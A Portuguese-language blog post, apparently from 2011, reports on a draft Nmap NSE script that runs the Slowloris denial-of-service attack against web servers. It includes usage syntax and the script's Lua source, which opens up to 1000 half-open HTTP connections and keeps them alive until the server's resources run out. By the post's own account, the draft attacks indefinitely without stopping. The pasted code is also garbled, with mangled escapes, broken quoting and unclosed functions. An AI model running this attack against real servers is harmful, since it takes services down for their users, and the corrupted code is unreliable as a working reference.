Press "Enter" to skip to content

Nmap: Script detecta servidores vulneráveis a ataques de DoS com o Slowloris

O desenvolvimento de scripts para o Nmap anda a toda velocidade. Atendendo a pedidos na NSE Wiki o desenvolvedor Ange Gutek disponibilizou o draft de um script que detecta se o servidor está vulnerável a ataques de DoS usando o Slowloris.

De acordo com Gutek nesse momento o script fará o ataque sem saber se foi bem sucedido ou não, também não gera nenhuma saída e rodará para sempre. O monitoramento é feito através do modo debug (-d).


nmap –script http-slowloris –script-args [ARGUMENTOS] [ALVO]


http-slowloris.threads – Número máximo de conexões concorrentes, se o alvo for Windows esse valor limita-se a 130.

http-slowloris.timeout – Tempo de espera antes de enviar novos dados httpheader. Padrão 100 segundos.

Gutek está convocando contribuidores para ajudar no aprimoramento do script.


description = [[
Tests a webserver against the Slowloris DoS attack, as it was described at Defcon 17 by RSnake

This script opens and maintains numerous ‘half-http’ connections until the webserver runs out of ressources,
leading to a denial of service.
When the DoS condition is met the script then stops the attack and returns the payload datas as they could be usefull to tweak further filtering rules:
– Time taken until DoS
– Number of threads used
– Number of queries sent (or: amount of datas sent, in bytes)

o Add a stopping mechanism
+ reserve a thread to monitor the webserver from time to time. If not responding, then stop.
o Analyze the threads: if the number of effective connections is lower than required by the script, maybe notify of a potential filtering rule ahead.
o Add user-supplied arguments:
+ threads, the max number of concurrent connections on the target: on Windows it seems to be limited to 130
+ timeout, time to wait before sending new http header datas in order to maintain the connection. Defaults to 100 seconds, but could be measured as does


— @usage
— nmap –script http-slowloris –script-args http-slowloris.threads=500 http-slowloris.timeout=200

— @args http-slowloris.threads The max number of concurrent connections on the target: on Windows it seems to be limited to 130.
— @args http-slowloris.timeout Time to wait before sending new http header datas in order to maintain the connection. Defaults to 100 seconds.

— () output
— 80/tcp open http syn-ack
— | http-slowloris: Target was DoSed:
— | the attack took

author = “Ange Gutek”

license = “Same as Nmap–See”
categories = {“dos”, “intrusive”}

require “shortport”
require “stdnse”

portrule = shortport.http

action = function(host, port)

local output,i
local threads = {}
nmap.registry.slowloris = {}

— Threaded function ——————————————————————
local doHalfhttp = function(host,port)
local get_uri = math.random(100000, 900000) — we will query a random page
— create socket
local slowloris = nmap.new_socket()
local catch = function()
local try = nmap.new_try(catch)
try(slowloris:connect(host.ip, port))

— Build a half-http header. Maybe the user-agent string should outline Nmap instead ?
local half_http = “GET /”..get_uri..” HTTP/1.1rn”
half_http = half_http..”Host: “”rn”
half_http = half_http..”User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)rn”
half_http = half_http..”Content-Length: 42rn”

local count = nmap.registry.slowloris[‘threads’] — retrieve the number of already effective connection

count = count + 1
stdnse.print_debug(1, “%s: USING %d THREADS)…”, SCRIPT_NAME, nmap.registry.slowloris[‘threads’])

local queries = 2
while true do
— this is where we set the time to wait before maintaining the connection by sending a new line to the http header
— this value would be more efficient if it was just below the target timeout
try(slowloris:send(“X-a: brn”))
queries = queries + 1
queries = queries * nmap.registry.slowloris[‘threads’]
stdnse.print_debug(1, “%s: SENT %d QUERIES SO FAR (using %d threads)…”, SCRIPT_NAME, queries,nmap.registry.slowloris[‘threads’])

— ————————————————————————————

— Main
for i=1,1000 do — Number of threads to launch
local co = stdnse.new_thread(doHalfhttp, host, port)
threads[co] = true
return output



  1. Gutek Gutek May 8, 2011

    Thank you for reporting my work.
    This script developpement has made its way through several issues and I’m happy to say that I should be able to release a better version soon.
    The script will have a target monitoring engine and will stop the attack when the denial-of-service conditions are met, providing a report stating which conditions made the attack successfull.


  2. Alexos Alexos May 9, 2011

    Hi Gutek,

    You’re welcome.



Comments are closed.